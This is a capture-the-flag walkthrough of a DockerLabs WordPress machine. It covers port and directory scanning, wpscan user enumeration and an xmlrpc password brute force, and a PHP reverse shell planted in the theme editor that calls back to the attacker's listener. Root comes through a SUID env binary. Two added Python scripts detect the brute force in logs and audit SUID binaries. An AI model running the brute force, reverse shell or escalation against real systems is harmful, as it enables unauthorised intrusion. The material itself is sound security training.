WalkingCMS DockerLabs (Easy)

Installation

Once we have the .zip, we copy it to the environment from which we are going to attack the machine and run the following.

unzip walkingcms.zip

That unpacks it; then we deploy the machine as follows.

bash auto_deploy.sh walkingcms.tar

Info:

                            ##        .         
                      ## ## ##       ==         
                   ## ## ## ##      ===         
               /""""""""""""""""\___/ ===       
          ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~
               \______ o          __/           
                 \    \        __/            
                  \____\______/               
                                          
  ___  ____ ____ _  _ ____ ____ _    ____ ___  ____ 
  |  \ |  | |    |_/  |___ |__/ |    |__| |__] [__  
  |__/ |__| |___ | \_ |___ |  \ |___ |  | |__] ___] 
                                         
                                     

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

So when we are done with the machine, we press Ctrl+C and the script removes it so that no leftover files remain.

Port scanning

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>
nmap -sCV -p<PORTS> <IP>

Info:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 12:35 EST
Nmap scan report for express.dl (172.17.0.2)
Host is up (0.000029s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.48 seconds

If we browse to port 80 we see nothing interesting (just the Apache default page), so we move on to fuzzing:

Gobuster

gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 100 -k -r

Info:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html       (Status: 403) [Size: 275]
/.htpasswd.php        (Status: 403) [Size: 275]
/.htpasswd.html       (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/.htpasswd.txt        (Status: 403) [Size: 275]
/.htaccess.txt        (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/.htaccess.php        (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 10701]
/server-status        (Status: 403) [Size: 275]
/wordpress            (Status: 200) [Size: 52441]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================

We see it hosts a WordPress, so we can check for the admin panel by going to the login page.

URL = http://<IP>/wordpress/wp-admin

And indeed this takes us to a login panel, so we will obtain the username as follows:

Shell as www-data

wpscan

wpscan --url http://<IP>/wordpress --enumerate u

Info:

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://172.17.0.2/wordpress/ [172.17.0.2]
[+] Started: Mon Jan 13 12:39:43 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.57 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.17.0.2/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.17.0.2/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://172.17.0.2/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.17.0.2/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:03 <============================================================================> (702 / 702) 100.00% Time: 00:00:03
[i] The WordPress version could not be detected.

[+] WordPress theme in use: twentytwentytwo
 | Location: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/
 | Last Updated: 2024-11-13T00:00:00.000Z
 | Readme: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/readme.txt
 | [!] The version is out of date, the latest version is 1.9
 | Style URL: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/style.css?ver=1.6
 | Style Name: Twenty Twenty-Two
 | Style URI: https://wordpress.org/themes/twentytwentytwo/
 | Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/style.css?ver=1.6, Match: 'Version: 1.6'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] mario
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://172.17.0.2/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 13 12:39:49 2025
[+] Requests Done: 1322
[+] Cached Requests: 12
[+] Data Sent: 377.335 KB
[+] Data Received: 29.704 MB
[+] Memory used: 239.426 MB
[+] Elapsed time: 00:00:05

We see we obtained a user named mario, so we will see whether we can get his password.

wpscan --url http://<IP>/wordpress --usernames mario --passwords <WORDLIST>

Info:

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://172.17.0.2/wordpress/ [172.17.0.2]
[+] Started: Mon Jan 13 12:41:10 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.57 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.17.0.2/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.17.0.2/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://172.17.0.2/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.17.0.2/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:01 <============================================================================> (702 / 702) 100.00% Time: 00:00:01
[i] The WordPress version could not be detected.

[+] WordPress theme in use: twentytwentytwo
 | Location: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/
 | Last Updated: 2024-11-13T00:00:00.000Z
 | Readme: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/readme.txt
 | [!] The version is out of date, the latest version is 1.9
 | Style URL: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/style.css?ver=1.6
 | Style Name: Twenty Twenty-Two
 | Style URI: https://wordpress.org/themes/twentytwentytwo/
 | Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/style.css?ver=1.6, Match: 'Version: 1.6'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - mario / love                                                                                                                                     
Trying mario / love Time: 00:00:02 <                                                                                 > (390 / 14344782)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: mario, Password: love

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 13 12:41:20 2025
[+] Requests Done: 1234
[+] Cached Requests: 608
[+] Data Sent: 448.523 KB
[+] Data Received: 439.433 KB
[+] Memory used: 289.152 MB
[+] Elapsed time: 00:00:09

We see it found the password, so we log in to the panel with the obtained credentials.

User: mario
Pass: love
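The password attack above runs over xmlrpc.php, which leaves a very recognisable trace in the web server's access log. As a defender-side check, added here and not part of the original writeup, the following Python script flags any client that POSTs to xmlrpc.php more than a threshold number of times inside a sliding window; the log lines it runs on are constructed to resemble that traffic, not a real capture.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined-log prefix: client, identd, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return ip/method/path/status plus a datetime ts, or None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def xmlrpc_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Map client IP -> total xmlrpc.php POSTs for clients exceeding `threshold`
    POSTs inside any sliding `window`. wpscan packs many guesses into one
    system.multicall request, so keep the threshold low."""
    stamps = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/xmlrpc.php"):
            stamps[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, ts in stamps.items():
        ts.sort()
        start = 0
        for end in range(len(ts)):
            while ts[end] - ts[start] > window:   # shrink the window from the left
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(ts)
                break
    return flagged

def constructed_sample():
    """Constructed log lines, not a real capture: 30 xmlrpc POSTs in 3 s from
    one client, plus normal traffic (one legitimate xmlrpc call) from another."""
    base = datetime(2025, 1, 13, 12, 41, 12, tzinfo=timezone.utc)
    attack = [f'192.168.120.128 - - [{(base + timedelta(milliseconds=100 * i)).strftime(TS_FMT)}] '
              '"POST /wordpress/xmlrpc.php HTTP/1.1" 200 417 "-" "WPScan v3.8.25"'
              for i in range(30)]
    benign = [f'10.0.0.5 - - [{base.strftime(TS_FMT)}] "GET /wordpress/ HTTP/1.1" 200 52441 "-" "Mozilla/5.0"',
              f'10.0.0.5 - - [{base.strftime(TS_FMT)}] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 300 "-" "Jetpack"']
    return attack + benign
```

Calling xmlrpc_bursts(constructed_sample()) returns {'192.168.120.128': 30}; feeding it the real access log of the container (`docker logs` or /var/log/apache2/access.log) works the same way.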

We go to Appearance -> Theme File Editor and, in index.php, insert the following code somewhere:

<?php
$sock=fsockopen("<IP>",<PORT>);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>

We click Update File, which saves the code; then we start a listener as follows:

nc -lvnp <PORT>

And we visit the following URL.

URL = http://<IP>/wordpress/wp-content/themes/twentytwentytwo/index.php

If we go back to where we had the listener, we will see the following:

listening on [any] 7777 ...
connect to [192.168.120.128] from (UNKNOWN) [172.17.0.2] 60426
whoami
www-data

Shell upgrade (TTY)

script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash

# To see the dimensions of our console on the host
stty size

# To resize the console with the right parameters
stty rows <ROWS> columns <COLUMNS>

Privilege Escalation

If we list the SUID binaries, we will see the following:

find / -type f -perm -4000 -ls 2>/dev/null

Info:

1966337     52 -rwsr-xr-x   1 root     root        52880 Mar 23  2023 /usr/bin/chsh
1966461     48 -rwsr-xr-x   1 root     root        48896 Mar 23  2023 /usr/bin/newgrp
1966472     68 -rwsr-xr-x   1 root     root        68248 Mar 23  2023 /usr/bin/passwd
1966524     72 -rwsr-xr-x   1 root     root        72000 Mar 23  2023 /usr/bin/su
1966398     88 -rwsr-xr-x   1 root     root        88496 Mar 23  2023 /usr/bin/gpasswd
1966456     60 -rwsr-xr-x   1 root     root        59704 Mar 23  2023 /usr/bin/mount
1966548     36 -rwsr-xr-x   1 root     root        35128 Mar 23  2023 /usr/bin/umount
1966331     64 -rwsr-xr-x   1 root     root        62672 Mar 23  2023 /usr/bin/chfn
1976895     48 -rwsr-xr-x   1 root     root        48536 Sep 20  2022 /usr/bin/env

We see an interesting one, env:

1976895     48 -rwsr-xr-x   1 root     root     48536 Sep 20  2022 /usr/bin/env

So we do the following:

env /bin/bash -p

And with this we are root.

bash-5.2# whoami
root

So we have finished the machine.
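The root path here exists only because /usr/bin/env is setuid root, which no standard Debian image ships. As a defender-side check, added here and not part of the original writeup, the following Python audit parses `find / -type f -perm -4000 -ls` output and reports setuid-root binaries outside a baseline; the baseline is an assumption about a minimal Debian install, and the sample input is the listing from the page.

```python
# Assumption: the setuid-root programs a minimal Debian image ships by default.
# Anything setuid outside this set deserves a look; /usr/bin/env in particular
# executes whatever it is given without dropping the inherited privileges.
EXPECTED_SUID = {
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/mount",
    "/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/umount",
}

# The `find / -type f -perm -4000 -ls` output from the writeup, used as sample input.
PAGE_FIND_OUTPUT = """\
1966337     52 -rwsr-xr-x   1 root     root        52880 Mar 23  2023 /usr/bin/chsh
1966461     48 -rwsr-xr-x   1 root     root        48896 Mar 23  2023 /usr/bin/newgrp
1966472     68 -rwsr-xr-x   1 root     root        68248 Mar 23  2023 /usr/bin/passwd
1966524     72 -rwsr-xr-x   1 root     root        72000 Mar 23  2023 /usr/bin/su
1966398     88 -rwsr-xr-x   1 root     root        88496 Mar 23  2023 /usr/bin/gpasswd
1966456     60 -rwsr-xr-x   1 root     root        59704 Mar 23  2023 /usr/bin/mount
1966548     36 -rwsr-xr-x   1 root     root        35128 Mar 23  2023 /usr/bin/umount
1966331     64 -rwsr-xr-x   1 root     root        62672 Mar 23  2023 /usr/bin/chfn
1976895     48 -rwsr-xr-x   1 root     root        48536 Sep 20  2022 /usr/bin/env
"""

def parse_find_ls(output):
    """Yield (mode, owner, path) per `find -ls` line; skip malformed lines.
    Field layout: inode blocks mode links owner group size month day year path.
    maxsplit=10 keeps a path containing spaces intact."""
    for line in output.splitlines():
        fields = line.split(None, 10)
        if len(fields) != 11:
            continue
        yield fields[2], fields[4], fields[10]

def is_setuid(mode):
    """The owner-execute position of the mode string carries the setuid bit (s/S)."""
    return len(mode) == 10 and mode[3] in "sS"

def unexpected_suid(output, baseline=EXPECTED_SUID):
    """Return setuid-root paths that are not in the baseline, in the order seen."""
    return [path for mode, owner, path in parse_find_ls(output)
            if is_setuid(mode) and owner == "root" and path not in baseline]
```

On a live host, pipe the real `find` output in instead of PAGE_FIND_OUTPUT and compare against a baseline taken from a known-clean image of the same distribution.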
